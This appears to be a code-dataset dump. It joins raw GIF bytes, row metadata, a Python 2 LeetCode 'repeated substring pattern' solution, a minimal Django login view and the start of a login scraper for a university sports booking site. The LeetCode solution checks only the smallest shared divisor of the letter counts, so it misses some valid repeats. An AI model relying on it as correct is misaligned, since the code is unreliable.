9\xbc\xc4\xfb\xbb\x02\xe1\x99\xe4\xb0Tc\x80\xbd\xaad\xbd\xe1`sg\xe0\xbd\xb2\xc4\xbd\x9c\xf9\x0b\xe2;\xbe\xbdP\xbe\xe6\x9b\x0b\xe8\x9b\xbe\xb7\xb0\xbe\xec;\x0b\xee\xfb\xbe\xb1\x10\xbf\xf2\xfb\n\xf4[\xbf\xabp\xbf\xf8\x9b\n\xfa\xbb\xbf\xa5\xd0\xbf\xff\xfe;\n\x00\x1c\xc0\x87D\xa6\x04<\x13\x03|\xc0\x9c\x90\xc0\n\xbcH\r\x0cf\x06\xfc\xc0\x99\x16\xc1\x12\xcci\x14\\\xc1\x9fv\xc1\x18,j\x1a\xbc\xc1\xa5\xd6\xc1\x1e\x8cj!\\I\x0c<\xc2\xf6\x00\xc2&\xec\x10%<\x1e\xe7\x82\x1eH \x84S\xf0\x9a\xf3\xb4\x9cG \xc3\xa9A\xc3FPyD\xa6\xba`\xa0\xc3V\x80\x14\xc3\x96\x05\xcc\xe6\x15\xeb\x06\x8c\xdf\xb0\xb6LC\'G\x10\x1f\x80\xd8\x04M,\x19\xc0\xa9\x04Ol\x04\xcdI\x9c6\xccn\xce\xc3\x05\xda{\x05\x9b\xb7\x94\xb4\xb0\x7fA\xb4\xc5u\x0b\x0el\xaa%\x9f\xa7od\x12!U\'-\xbeI\x045Rq\xf5\xa1\x1bfH\xa1"\xca\x9f}"\x18\x10\xea\x1e\xbd\x02\x9fp\xa5\x18j\xbb\x9d\xa9\x01\x9aBH\x1ei\x9c]\xafR\x15\x14\n\x81\xd4\x93\xc8\x03z@\xf7!"C\xd1\xc6\xf2\xb95)\xe3Oo\x8co\xc51\x1c\xef\xe2\xc2\xf3d\x1c\xa0\xd1N \x97.\x97\xac\x19\x05W\x1d\xfd\xb6\x1c\xf5q\x1f\xff\xf9\xd1\x14\x91\x8c\xc38\x11\x0e\x868O\\\xaa-j\xdc!V: f\xab\xa5{\x18\'%\xb2\xa4f!\xa2a:\xab0\xba&U1#.\xeatCr\x1a\x80<"B\xe2A:\xfa#\x06S\xc9\x0c\xc8\x82f7\x87\x83Z\xcdiaQS\x9a\xccR\x0b\xcdk\x81v`"\xcd#\xa2\xcbk\x11\x1a\xd1V2C3&A\xa2\x1b\x06\x83\xaaO\xb7&1\xf5x\xe5<u\xa51\xcc\xe6\xa6@tr\xaar\x82\xcb\xb7\x0b\x0e@\xb8\x91(\xb9wL\x83\x1b\xa2\x07\xd0#\xc2\x18\xa3\xfa?j\x91{\xed\xc2\xd0t\xf3|\xa8\x82\xa9\xd5Cz\xcbc\xbb\'\xd9"\x0b\xddM\x02M\x8e\x0c]\x8c\xa4r\xa7\x94\xc2\x1f\xc3\xc7+)i+\xf5\xa1|\x0e\xa3\x14\x08\xbd&X\x81\xd1\x10\xda\x8a`c|\xe9\x9c\xb2\x14mb+]{\xfe\x92\xaf\x1e\xbd\xa6l[\xd0q:\xc6\xdf\x80u\x92K1LL2\x05\xf3\x80\x14\x18\xb2 \x03 \xbeh\xcd\xdc\x869\xfc\xb2\xad2\x02\x7f\xff\x16-\x1c\xee\xe7\x85E\xadyf\x8a\x17\x01\xb8\xd5\x1fK\x17!{\xd4\xd3LWg\xd3\x81\x8f\xe1~)\x15\'\xf8\x92/%\xeb\x8eT\x8d\xac\xf5\x97\x8a:\xfd\xcd\xfa\x125\x05"\xd6z\x89\xc2\xa4\x00b\xaf\x82\x80\x8c\xa36\xd4\xc3\xa9-\xc2F\xf8\xc6\x1e\xe4\xa8\xb2[\xa2\xb2m\xda\xb3I(\x83\xfb\x84\x1b9\xe4#\x11\xa0(\xfb\xcaP\x87\xed\xafU\xe1\xd1\x8d\xed\x82g\xbb\xc8]BD\x83m\xb5SQ\xd8\xb0a\x1f\x93\x9d,\xcb\xe3A9a\x85\x1c8\x83\x1a;\xc8:x[\x16\xe8\xd1\x88c\xd7\x82]\xd1y\x1d\x0ee\xc1\x9a3\xf2\xb6|X+\x9c\xfa7\xcbc=\xe3\x0c-\x82"\x81wH!\x9e#~T\xcbE\x07\x19\xac\x95\x18\x8a3\x82\xb3C\xb0*\xefa0?kY\x99B \xb8L\xb6\xf7\\\x8b\x95x\x18 \x9b\xb6\xc3\xbd\x17\xc8]+\xc5\xad\x8b\xd6-\x8e\xdc\xcc$IA;\x1e\xc4\x81\xd2\xad\xb1\xb9((\x85\x08\xa7s\x1dw\xde\xb3wNW\xde\xff\xfd\x0c\x0e_\x07/OF\xd5L\x92!\xd3\xd8\x8b\x9a;"\x02\x89\x85\rh\xba\xa6S\xa5\x0e\xbe\xd8\xa8\x93\xba\xe8\x88\\\r\xa2>\x14\xe0@\xe2\x89\xb8\x05\x1e\xac\x14\x1427\xa4\xc8\x05D\xba\xde\xea\xd9\xd1\xc30\xe4\xd8\xe1\n~\x8c\x19\xde\xc2\xbcA\x90\x0f\x95@Je>+T\xce\x0bn\x8c\x194\xdbDS\x905t\xe2\xe9r\xa1H\xa9\xd7\xa8@\x16\x93\xed\xbb\x14Y\xbcG\xfemv\xb1\xbb\x87rER@\x91L\xb4\x92\xd1{\x91/i\x04P\x14\x91\x10\x99\xe5\xcc\xeb\x92@N\xbd\xd3\xdbEQ\xde\xad\xbe{D\xbd;\xe6\xff-\x11@\xfe\ri\xde\x05k.\xc2\x16!r\xe6\x00\xe7d \xe7\x1fQ\xc2)\x9c\x08v~\xe7\x85\x90\xe7z.\x95B\xde\xe7\x03\xc1\xe7\x80\xbe\x0f\x7f>\xe8\xfe \xe8\x86\xbe\x07\x88\x9e\xe8y\xb0\xe8\x8c\xdee\x85\xfe\xe8\xf5\xe0\xe8\x92\x0e\x10\x91^\xe9\xf0@\xe9\x98\xce\x0c\x97\xbe\xe9\xaa\xea\xe9\x8a\xd6\xe9\xa0~\xe6\xa3\x8e\xc0\xa2^\xea\xff@\x8d\xea\x93v\xea\xaa\xce\r\x9a\xde\xeaf\xf0\xea\xb0\xfeJ\xb3\xfe\x12\xb2^\xeb_p\xebX@\x9bKP\xc4n\x9c\x14\x8c\xf2Mr\x04\xcaI\x93\x04\x91\xc1d\xd8\xc0US\xa9\x1d\xec4\x93I\xa9\x04\x19\xe0\xebJ\xc0\x91t\xae\x04\xd2n\x15\xac\x0e\x14\xd9\xfe\x0b\xb0\xb8#k\x0e`\x02\xe6XFq^\xf7S#3\x07\x00\xd2.\xd7\xa5\x850\x1c\xf5$\xdb\xf6\xec\xed\x15\xa8\xa2A\x16\xae\x11dH\x85bG\xf0!h\xb4*1\xe5^\xc4\xb1:M \xc3\x08&\x11\xba\xee\x04E\xba\xa2+\xb6m\xc12`XL`\x0e\xbf>G\xd0\x8e\xe4\xb4\xee\x0f\x8aW\xcc#dl\xa1>~E\xf1\x0b\xe6[5\x02\x9c\x98\xb1$w|WluQS\x91R\xae\xf1P@>X/5\xf0\x11Q\xf0N\x10\x83\xf2\xe1\xb6G\xc0\xaf\x026*kM\xeeMr\xee\x90\x9aM\x1aI\xd6(4T.o\x15\xe0\xbe\xf1\xbarQ\x1d\x90\x80}\xad\x17\xd4qS\x9c\xd1\xc6R\x0b\x00\xff\xd7\xc4)\xe4tA)s\\\x80\xe7.\xdf\xb6`\x01F\xf0\xdb\xde\x0b|\xa2\xf5\x92q\x85\xa3=\x84\x0f\xef\x1bt$\x1eI\xd07#\x85[\xa9!\xb3\xa55\xf4\xaa#"\x1b\x8f)z\x81\x87\xd5\x9d(sb\xb9\x85a\x9aH\x908\xe1C\xf1\xd7\xc6\x16\t\x7fk\x1c\x7f\xf6^\x8f\xe6\x97%\xe6\xbe14\x0f8b\r\x07b\xe5.d$\xf6XF\xc0)\x13H74\x9a\xcd\xbce\x9dn\xe3{\x13\x85W\x91\x85\x1cI\x96&\x91qXl\xe1Q\xed\x04.\x15\xb3\x88G\xd1^<E\xf3[\x7f\xf3Z\x82\xb4\x13\x01\xf3M\xd0-\x00v\xa1L\xb25J\xcf^BP\x1a\xa5\xf1\x16\x13\xb5\xfaH\xd0\x8e\x1e\xd0\x8eO\xc1$\xccS\xce\xdf\x05A)),\x9eU\xfc\x1e\xd50\xbai-\x1d\xf3MN\xd8O\xc2\xa6)I#"\\XO/\xb2W\xdc9R\x80J\xfb\x18\x7f\xfb_\xcf\x0be\xf1\x1e\x01\x1a\x17k\x8b\x81X\x11\x15\xe1\x96b\xc1/\xfeB\x89\xdb\xa4\xc5<\xff}\xd0\xfc\xee.\xba PQD6d\x17F\xa8\x04\x87\x01\x96\x05`\xdcJl0>\xa45OXcoe\xb9\\,*\x03MH\\\x0e.+\x0f\xcc\x83\xb9\xd0\x8c*\x1d\x06\x03\xddL\x83\xde/8,\x1e\x93\xcb\xe63\x1a\\\xa9\xa4\xdb\xee7<._a\x06\x16\x8f\x92\x97\tZUY\xde\xc5\x9eJFV\xa1F\x1f\xe0\xce\xca\x86J\x85\x93J\x15A\x97\n\x05\x07\x07\xd0\n\xca\n\x85N\x12A\xc7@\xcd\xc9\x12\x8a\xa2\x17"_\x96\xd1\xc5\x00\xa3PaVS\x98\x15\x05)\x9b\xe4\xe3\x9c\xee.o/\xda\x9ao\xb0\xf0\xf0\xf0\xd0\x18\xe2\xdfW\x11\x99&\x99\xd1$X\xf3\xd1-d(\x9d\x06i\xe0\xec\xb6\x0f\x87\x8575\xaa1\x18*\xcf\xe42q\xba\xfa\xfa\x170\xfb;|\xbcO.y\xcd\r\x0e\x0e^\xa3L\xe1\x8bW\x05>\x1c\xaez\xb0\x81\xa6\xccT\x05\x00vb\x00\xa0F\xa1N\xc0r<$\xd6\x80r\xc7\x03\x9b\n\x8a,\xc0\xaaC\x8f\x0f\x18\x83\xf2F\xff\x92\x8c\xe3\xae$\xca\x94*W\xbe\xa1\x80I\x1d\xb5F\x9eX\xd2\xac)\xe7\xa4\xcd\x9c:w\xf2\xec\xe9\xf3\'1\x9c@\x87\x12-j\xf4(RvB\x932m\xea\xf4)T\xa2K\xa3R\xadj\xf5*V]S\xb3r\xed\xea\xf5+\xd5\xad`\xc7\x92-kv\xa5\xd8\xb3j\xd7\xb2mk2\xa6\xdb\xb8r\xe7\xd2\xad\x91\xb6.\xde\xbcz\xad\xde\xdd\xeb\xf7/\xe0\x9f}\x03\x13.lx\xe4\xe0\xc3\x8a\x173\xd6\n\xb71\xe4\xc8\x92\xd3$\x9el\xf92\xe4\xca\x987s\x06\xac\xb93\xe8\xd0r?\x8b.m\x9a,\xe9\xd3\xaaW\xf3}\xcc\xfa5\xec\xac\xa9c\xd3\xae\xdds\xb6\xed\xdc\xbaU\xe2\xde\xed\xfb\xb7R\xd7\xc0\x87\x13G,\xbc8\xf2\xe4\xc3z+o\xee<\x0c\xf3\xe7\xd2\xa7\x13\x88\xce\x19c\x99\x1b\xa6VtP\x07@\xc3\x98\n\x82\xba;\xbb)(<\x1e\x8a\x94\xf1l\x18\xa8\x02c\x05}\xd2\xado\x1e7\xc6@\x87\xf35\x0c\xbc\x0c\xc6\x01\xbc\x18\xc6\xa0s_\x7fi\xff\xd8\'\xc62\x1f\xbd\xc1AA\xdbU\xc0\xc1\x80\xcf\xd1\x87\xd9\x81\xd5\x1d\xd2\xd0&\x18\x18\x80A\x06-X\xa0A\x06\x14l\xb0!\x0b\x18|\xa8\x9f$\tY@^\x06\x87\xcc@\x00\x11&j0\x13\x8c/\xb8\xa7B\x07/\xcc\xc8\n\x88\x1a\xb4\x92\xc1@;\xe4\xf8\xe1%\x06\x90\xd0\xde\x1d\xff\xad8\x88\x8b4\xc4H$\x8f{\\`c\x0f9\xca\xf0\x0c\x8e0t\x07\xa4\x8cILi\x81+\x1bT\xe0\xe2\x91\x92x@\xa6\r\'X\xf1\xe5\x8d\xc3Mx\xd9\x81\x1cl\x88\xc2\x00\x98h\xc8a\x0c( 1"\x06\x14\xe4\xa9\xe1L\x06\x00\xa0g\x87s\xfaS\xc7\x14\x03\x00\xd8\x88\x01\x1b\xb0b\xca\x05\xf8M\x89\x8d\xa2-\xb62 \x7f\x91v0)\x01\x99\xce9@+\x1d\x18\xd0\xa1\x0e\x17\x1c"I\xa9\x8aFYA\xa3\x8f\xd6\xa0\xe9\x88F\xf0\x97\x01~\xa2\x9e \xa8\xa9\xab4\nJ\n\x16\x0c\xd0\x81\xa8\x8e>\xf3i\xafD\x18\xc1\xaa\xa3:$\xf7\xa6eqvG\x01\xad5\xffP0\xab5\x04h\xb0\xc1\xb4\xd0V{\xed&\xa3\x12\xe0\xe7\x05\x1b\x00\xc8\t!\x00F\xc8-\t\xd5\x92\xf0\xc8\r\xe0\xd6\xf2\x03:\xd3\xae\xabB\xbbF\xb2\xf2\xad\x16*\x0c!.%&``\xee\x0f\xc6\xa0[B\r\xe8\xd6[\xdd\xaf$\xc0h\xe4\xb7&\x0c\x1c\n\x98~L\xf1\x0c\x80\x04\x0f\xb1\xcc\xc3\xcb\x1eW[\x85&\x1a0\x00\x7f\xfb\xbd\x0b\xc4\x1f\x99\xfe \xb1\xc8\xfa\x96\xa2D2\x11Z`\x00\xcc0c\xf2\x1f\xc8v\x80\x0b\xe3*}\xf0G\xf3\xc7?\x98<B2Ch\x18\xb3\x01+\xe3<\x8f\x0fD\x87\xac\xb2\n\xcb\x84\xec\x01\xcc;\xf61\x84}\xfc\x8d\x93\xc52\xc9t\n\xee2/\x13]\xa0o\xccNv\xe0\x06MP \x01\xc3\x94\x18Y\xc1\xb6}\xae\xddv\xb7,\xeb\xc3\x89F;\x0cH\x01\x00\x1d\xb8\x04m\xc1\x1a\x88\xd0\xb5\x13\t\xd2b\xa4\x06~\x8fl\xaf\x15A\xa3\xe0\xc1\xde{\xb4l\xc4\x10x\xeb\xed\x92~yg)\xaf\xc2\xbc\xde{EB,\xff\x1ay\xf5\xc4fB\xf2\xb9\xb1\x927\xae1q\x07\xba\xc0\x82\x06K\x1f1\x82\xb2\x91\xee\x81\x04\x01\xb1{\xbb\xc2\xd2C\xd0\xeaD\x1d\x12<n\x8f\t\x92 "C\xba\x90ww/\xab{@\x8dw\n%\xc8\xfa.\xca\xf3\xec\xbep\x0bv\x1boC\xf0&\xd6\x00\n\xa9\xcf\x97M\x83\x0c\x912R\x07\xf6\x1d\x16\x8e\xb4$\xa1k\xf8\xa0\x06\xe9\x19[\xbe\xf0\xa8\x03\xe7\'\xd13x\r\xf5y\xf2R\x00\xd0\xc7\xcf\x020*\xff\x12\x167\xa6\x81\xc2\x00\x16hP\xd3P1\xb4\x03n\x82m\x1f\xf3@\x9d4\xb4\x01\x0e\x80\xea!0\x1b\xd1\xfej\x06Ay\xa1Cq\x9f\xa8Yw\x1eg\xc1\xf1\xc1\x8c\x81\x9b\x18\x91\x01\x0e\x819\xa8\xa5\x10Fv0\xe0-\x866#\xf4a\xed\x19\nIa\x15\xde\'\x89\x12"\xd0M\x1b\xab\xcd\xde\\\x12\x06!R\x82\x88\xdf\x02\xc2\xdex`\xc4M,Q\x0c\x05\n\xa2\x10\xa3\x98\xc4"\x1e\x11\x8a`S\xe2\x14\x83\xb0\xc4\'b\xb1\x88#X\x06\xff\xd8\xae\x88E1RB9b\xa3\x8eb"\x84F\xc7\xac\xd16@j#/\xce\x08\xc79\xc2F\x8et\xbc\xe3i\xec\x88\xc7=\x82F\x8f|\xfc\xe3e\xfc\x08\xc8Af\xe6\x87\x84<d\x1d\r\x89\xc8E\xe6Q\x91\x8c|d\x1f\x1d\t\xc9I\x06R\x92\x94\xbcd!1\xa9\xc9\xd0\x08r\x93\x9e,K\'?)J\xaf\x84r\x94\xa6\xbcJ)O\xa9J\xa8\xa4r\x95\xaeLJ+_)K\xa9Xr\x96\xb6\xfcJ,o\xa9\xcb\x9c\xe4r\x97\xbeDK-\x7f)L\xa7\xf4r\x98\xc6\x84G1\x8f\xa9\xcct$s\x99\xce\xf4E3\x9f)\xcd9D\x93,\x16\xc1\x81k\xc4\x13\x06\x0e\xbc\x80F,P\xd0\x18\x8a\xd0\x01\xf5\x98\x81<*\xd0\x00\x00\xc0\x00\x1f\xf9\xc4\x81V"\x10C{~\x02\xa1\xb0\x05\x132\x1c!\x857\xd1\xf7\x05\x17\x80Skf\xf0\xc0\x06\x88\x07\x07\xcc\x9d3\x9fJ`\x90.:\xd0&/\xf8s\'\r\xadM5\xc7R\xa1\xea\xbc \x05Q\x12\x1eG^\xff\x05\x03F\xb4\x88#\x1c\xc8\x00\x0c\x9c\xd0\xd1\x17\xad\x00H\xe3\xc4\xd0\'tD\x03\x0f\x81\x88\x07,\x1d\x8f\x96l\xb0\xa1JX\xc4\x9c\x90\x80\x82\x89\x02\xe1\n\x13a\xe8\x02\x1d\xc0)$d\xb4\x07\x93\xc6\x80\ro\xec\xc0-Z@\x82&\xa5\xefU( R\x89N\xc4\x03G\x1d\xa2\x02\xe3\x9c\xa1\r\xf2t\xa4\x1bx@I,b\xea\x93f\x04R\x01Q)6\x11\x05K\x858\x91\xa8d\x81\xc8#\xa0\x18H\x11\xc0$\xa7)\xbc`\xacT0\x14""\xe5\x01S\x85BS\x9c\xfa\x13\xedV\x00\x80A\x01\x8aV\xc0\x1a\x15\x9f|\x80\x8d\x11\xe9\xe7CS*\xda2\xcaF\xa7\x1d&\xaaW\x84E\x82^\xf9z4~\xd9`F\xa5:\x95\xd6\x1e\x92*\xf0\x00v&Z\xaa\xc3\xa0\xceW\x07\x85B\xf6S\xa1\x1a\x15\x05\xa7\xa0BDE)\xa4\xe2\xe3\x95Y\xeb\xd9\x18\xaf\xc5l\x04\x8d\xfa\xe8\xb7"\xa7\rk\x99\xe2\x0f\x9c\xad\x1d!Rp\\\x13\x00as[;\x01\xbd,P\x02\xff \xa0+]\xd4\x15S\xc2\x04\x112WP0\x17\xd3\xbd\xc2\xfbLd\xd4\x87\xa43]\xdf\xb5V\xb2p\x07=9]\xe2W\xe2\x02\x82\xbf\x8a\xab\x81/J\xb7N\xe7tO\xc4:u\x89e\x04\xaf\xb3\x9b\xcb\xd7<\xde{\x85r\xd1\xb7\xa9\x0f#c$W\xe3\xae)\x96MPl0FBjV\xdc\x14$\x03\\\x7f\xa8\xb0}\xe2e$\x9e\xd9a@\x15\x8eT\xfd\x08\xc0\xc2\x19an\x9c\x1f+Z&hq1#p\xf3c\x14\xde\xc1\xb4<\x1c\xbao!\xee[\x00\xd8@\xb4\x86\x163\xa3E\xaf\x082\xae\x8110W\x04\x82\xfa8q;\x10\x9a\xd2\x8c\x96\xb5b\xa9-\xb7\xac\x99h\x88\x12\x92Nc\xe8 \x03\xbe\x9b\xb0\xe88wa\xf9\x0c\xe0\x9dG{]\xe1\xd8P\x04\xb6\xad@\x03\x8a 3\xe5F\xb0\x87q\xba\rZ\xf8\xb9\x84}\xc8\x0c\xdeeX\x82\x03#\xd2\x88>\xe4$g\xe2b\nz\x9f\xe0\x08x\xb4\xd0\xb8\x87`\x19g{63\x90\x1f\x112\xa7%\xff!\xa0\x1d<\xf2\xe2\x06\xfd\xbb?X\x8e\x04ic\xcdY\xbfR!wJb\xca\xdd1\x80\x98ID\x87\xe6\x15M\xb4\xa2\xdb\x9d\xa9S\xdcd\xe29\xafv\x16\xbd\xdd\x15\xfaT\x82p\r\x80\x03\x12\x90\xc1\xb4\x18Tk\x0b\xd2CY#z\xdf\xf9(\xa8\x11P\xff\x07\x0f\xb6SS\x931\xd5eK\x07\x0e\t\xfe\xfc\xdd\xb1\x13M\xe3\x04ZK\xac\x972\xb2\xca\xa6\x17\xa9\xeaQ;_e3\xdf\xa20\xad[\xc6\xf0\x16f\xca-\xa1\xe3\x1a\x85BE\x85;\x19\x05<`-Z\xf8n/\x7fyk\x0e\x1c\xc0\x06\x03h\xd3\xeaxm\x07#\x1e\xc1\xff2\xc0B\x1ba\x82\x7f\xbez\x9f7\xcc\xddi\x90\xcdP\xdf\xf56Y\x99\xabU\xc0\x84=\xdbz\xfc\xee\xdfD\x14]\xe0\xff(\xfc\xd1\x04\x04aS\x8f\x16\xa9@G\x8d\x06\x0f\x15M\xa6\xbdbE/4\x11\x0cP\x1cc\xcb\xa9\xb8\xf2*j\xb1\x07F\x94\xa2\x18\xc3X\x83,l\xb1\xe51\x97V\x16\xc7\x10\xf4.*\xb1\x0c\xffA\x94\xd0\xb8\xa7i\x86\x93+\x1d\x0e)\x9f%\x11\x9a\x1e\xc7\xa4K\xbd\xea\xc8\xa4\xba\xd5\xb3\xceL\xack\xbd\xeb\xd0\xe4\xba\xd7\xc3NM\xb0\x8b\xbd\xecnx\xba\xd9\xa5\x8e\xf6\xb4+}\xedl\x97\xa6\xdb\xdf\xee\xcc\xb8\xcb]\x99t\xaf\xbb1\xef\x8ewa\xea}\xef\xbe\xec\xbb\xdfu\t\xf8\xc0\xdbr\xf0\x84\x97\xa5\xe1\x0f\xef\xca\xc4+^\x95\x8co\xbc)\x1f\x0fyQJ~\xf2\x9e\xac\xbc\xe55\x89\xf9\xcc\xaf\x85\x02\x07H\xc0\x07>\x90\x80\x048\x80\x00\x0fp\x00\xeaQ\xbf\x809H \xf5\xaaG\xf0\xd49\xbf\xc6\x03|@\x00\xb6\xbf}\x02\x08\xa0\x80\xdb\xdb>\xf7\x04\x00}\xe8C\x7f\x8038\x80\xf7\x02\xf8\xc0\xd5eO\x9d\x03\x18\xff\xf6\x05\xa0@\x01\x8c\x9f\x80\x11\xd4\x9e\xf7\n8\x03\xf3y\x8f\xfcwl^\xf9`\x91@\xf5\x9b\x7f\xfd\xe8\xf3\xde\xf7\xe1\xb7\xfd\xf5\xcd\x90\xfd\xdbo?8\xde\x7f\xce\xfa\xd9/|\xe8K_\x02\x048\xbf\x00\x14\x00\xfb\x1a\xc4\xff\xf8\xc9\x7f\xff\xbfr\xd0\x9f\xf6E\x80\x04H\xc0\x08\x90\x1f\xee\x99^\x01\x04\x9f\xf0a\x9f\xf1\xb5\xdf:t\x1f\x00rE\x02H\xdfK `\xef\xd9\x9f\x01\xbeA\xffA L\x90\xdd\x04r\x86\x00\xde^\xfa\xad\x00\x06\n\x80\xef\x19]\x04,\x00\x01\xf2\xdf\x03\xbe\xc1\x04L@\x03\x8c\x00\x05\xc8 t\x80`\x08Z\x06\x03>`\xf0\x1d\xc0\x08f \x01, \x03:\xc0KH\xc0\x02>`\x02\xac^\x07\xd6\x00\xf0\x05_\x01H\x00\x04 \x00\x02\x04\x80\x142@\x030@\x00da\x000\x00\x040\x80\x14\xde`\x0e\x0eG\xf3\x8da\x01\x04\xa1\xf4\x99\x1e\xfe\x95\xa0\xee\x8d!\t\x12\xc0\x12~\xcb\xee\x19\xdf\xf0M\x80\x16f!\x02`a\x1d"@\x03T!\x18\x86\xe1o\xb0\xa1\xf1\x15@\x04\x9c`\x02\xd8_\x1a\xae@\x05\x02\xa2\x00\x0c\xdf\x1b.@\xf3=!\x054@\x1dR\xe1$n!\x01x!\x02\xf4\xa1\x1f\xee\x86"& !\xaa\xc0!\xfe^\'\n@\xe9\xbd!\xfe}\x00&T\xffb%2\xc0\x08L\x80\x18H\xe0&:\xc5\xe8\x81\x1e\x12\x8e^\xe9\x11\xa2!\x1a\xdf\xf5\x15_\xf3}@\x01(\x80\x10\x12\xe1\x12\x9e\xe0\x07D\xc0\nH\xa2*\xd6\xe1\x04@\x00\x19\xc0b,>E"\xb6a\r|\xe2\xfd\xe9\xa2(\x06b\rH\xc0\x02\xd8\xdf\x126_\xe9\xd5\x80*\xde\xe11\x96\x813>cSD\xa3\xed\x95\xe14\xd6_5Z_;\xe2\xde\x03\x80M\x07\xa2\xa3\x00\x94!& \xe3$B\x80+\xfe\x02\x0e\x9acc\xd0\xa3:\x9a\xe0\x19\xbe#\xfa=\x807~A\xff5_\n\x82\xe3$2\xc0\xd9\xf5\xa3?.\x06@\xf2\x00.\x12d\xfeE@\xf3E\xc0\x15%d >\x00\x0f\xe0\xa3\x16N\xc0\xfe\x05A9F\xe4QL\xe4:\x96\x1f(\xea\xa2A\x1a\xdf\xeayA\x07\x1e$\x0fTb\x03<\xa4I\xe6\x06J\nd\xf9\xe5\xa2;\x8a\x1fB>`\x1c\xb2\x9f1\x1ec%\xbeAI\xde$Q\xe4\xa4\nP\xe3!\xe2\x9f\x00\xbcd\x0ft \xf8\r\xff\xe4\nT"3\xb6\xc1Q"%P(\xa5\x19\xee\xa4E\x8e_/\xea\x9f\nH\xc0\x01\x08\xe3\x0b\x9e\xe0"\x02\x01Hf\xa1QB\xa4V\x06\x06W2\xa55.\x80S\x1e_\xe8\xa5\xa3\x1b\xbe\xe0T\x1a\x9fG\xaa\x80U\xda\xe4[\xc2F\\\xb2c(rd \x92\xe5\x0b\xe6\xa5\x05\x12\xc0Z\x06@[\x06\xa6`bcJ&\xe0W\xae\x00\xed)b\xee-!\xf5\xf9$\x01\xfc%V\xba%d\xee\xc5`ze(\xaa@\x04\xd0#\xef=\xdf\x1b\x12\x00/\xf2%\x04\x14%`\x86\xa6j\x1c@\x01\xd4fmB\xe5\xb7,\x80m\xd6\xe6\xf0y\xden\x16\x00n\x8ee\x014\xe1\xe8)\x801\x0e\xe2n\x0e\xdf\n\x00\xa3m\x02\xe3\xeay!t:dl\xca&l\xf4\xdc\x1c\x8c\xa4\xcd\xe9\xdctR\xa7\xd7e%w\xd2\xd3w\x8a\x9dw\x86gn\x8c\'yB\x14h\x9e\'\xe5\xa5\xa7z^\x1e{\xb6\xa7\xe6\xbd\'|^\x92y\xce\xe7j\xd4\xa7}6R~6\x1d~\xee3\'\xca\xad\x01\x80\x06\xa8\x80\x0e(\x81\x16\xa8\x81\x1e(\x82&\xa8\x82.(\x836\xa8\x83>(\x84F\xa8\x84N(\x85V\xa8\x85^(\x86f\xa8\x86n(\x87\nh\x08\x00\x00;'
| 8,017.25 | 26,043 | 0.732234 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 32,038 | 0.999033 |
1faa1a1b78082931266633b4320d81cdfa0d54a0
| 1,342 |
py
|
Python
|
python/repeated_substring_pattern.py
|
shub0/leetcode
|
8221d10f201d001abcb15b27c9cf4b8cd5060f1f
|
[
"BSD-3-Clause"
] | null | null | null |
python/repeated_substring_pattern.py
|
shub0/leetcode
|
8221d10f201d001abcb15b27c9cf4b8cd5060f1f
|
[
"BSD-3-Clause"
] | null | null | null |
python/repeated_substring_pattern.py
|
shub0/leetcode
|
8221d10f201d001abcb15b27c9cf4b8cd5060f1f
|
[
"BSD-3-Clause"
] | null | null | null |
'''
Given a non-empty string check if it can be constructed by taking a substring of it and appending multiple copies of the substring together. You may assume the given string consists of lowercase English letters only and its length will not exceed 10000.
Example 1:
Input: "abab"
Output: True
Explanation: It's the substring "ab" twice.
Example 2:
Input: "aba"
Output: False
Example 3:
Input: "abcabcabcabc"
Output: True
Explanation: It's the substring "abc" four times. (And the substring "abcabc" twice.)
'''
class Solution(object):
def aux(self, nums):
for denom in range(2, min(nums)+1):
if all(num % denom == 0 for num in nums):
return denom
return 1
def repeatedSubstringPattern(self, s):
"""
:type str: s
:rtype: bool
"""
import collections
size = len(s)
if size < 2:
return False
freq = collections.Counter(s)
denom = self.aux(freq.values())
if denom == 1:
return False
sub_string = s[:size/denom]
return sub_string * denom == s
solution = Solution()
print solution.repeatedSubstringPattern("abab")
print solution.repeatedSubstringPattern("ababab")
print solution.repeatedSubstringPattern("aba")
print solution.repeatedSubstringPattern("abaababaab")
| 26.84 | 253 | 0.655738 | 598 | 0.445604 | 0 | 0 | 0 | 0 | 0 | 0 | 607 | 0.45231 |
1faa329bdcdfd3ec7bf7b728a50094b19a036130
| 162 |
py
|
Python
|
all_auto_test/users/views.py
|
Evading77/all_auto_testing_eva
|
81fe4732a686327084701be1ef9cf5850e7d78d8
|
[
"MIT"
] | null | null | null |
all_auto_test/users/views.py
|
Evading77/all_auto_testing_eva
|
81fe4732a686327084701be1ef9cf5850e7d78d8
|
[
"MIT"
] | null | null | null |
all_auto_test/users/views.py
|
Evading77/all_auto_testing_eva
|
81fe4732a686327084701be1ef9cf5850e7d78d8
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.views import View
class LoginView(View):
def get(self,request):
return render(request,'login.html')
| 20.25 | 43 | 0.734568 | 93 | 0.574074 | 0 | 0 | 0 | 0 | 0 | 0 | 12 | 0.074074 |
1fac74b876540807e88381140691e44fb1871829
| 6,417 |
py
|
Python
|
src/webinterface.py
|
Wassasin/vrijbrief
|
de081395c651e73a436662bfe09f4542e0ca27c7
|
[
"MIT"
] | null | null | null |
src/webinterface.py
|
Wassasin/vrijbrief
|
de081395c651e73a436662bfe09f4542e0ca27c7
|
[
"MIT"
] | 1 |
2015-02-07T23:36:13.000Z
|
2015-02-07T23:36:13.000Z
|
src/webinterface.py
|
Wassasin/vrijbrief
|
de081395c651e73a436662bfe09f4542e0ca27c7
|
[
"MIT"
] | 2 |
2015-02-07T20:01:18.000Z
|
2021-05-13T13:21:11.000Z
|
import browser
import re
import datetime
from bs4 import BeautifulSoup, NavigableString
RX_OCCUPATION = re.compile(r"([0-9]+)/([0-9]+)")
RX_TIME = re.compile(r"([0-9]{2}:[0-9]{2})-([0-9]{2}:[0-9]{2})")
RX_FULLDATE = re.compile(r"[a-z]{2} ([0-9]{2}) ([a-z]{3}) ([0-9]{4})")
MONTHS = ["jan", "feb", "maa", "apr", "mei", "jun", "jul", "aug", "sep", "okt", "nov", "dec"]
class AuthenticationFailure(Exception):
pass
class Webinterface:
def login(self, mode=None):
# Prime session
self.b.open_url("https://publiek.usc.ru.nl/publiek/login.php")
# Submit mode
body = self.b.open_url("https://publiek.usc.ru.nl/publiek/login.php", [("PRESET[Login][login_groep][]", self.mode)])
# Submit login form
self.b.open_url("https://publiek.usc.ru.nl/publiek/login.php",
[("username", self.username), ("password", self.password)])
# Open main page; check if login was successful
body, _headers = self.b.open_url("https://publiek.usc.ru.nl/publiek/")
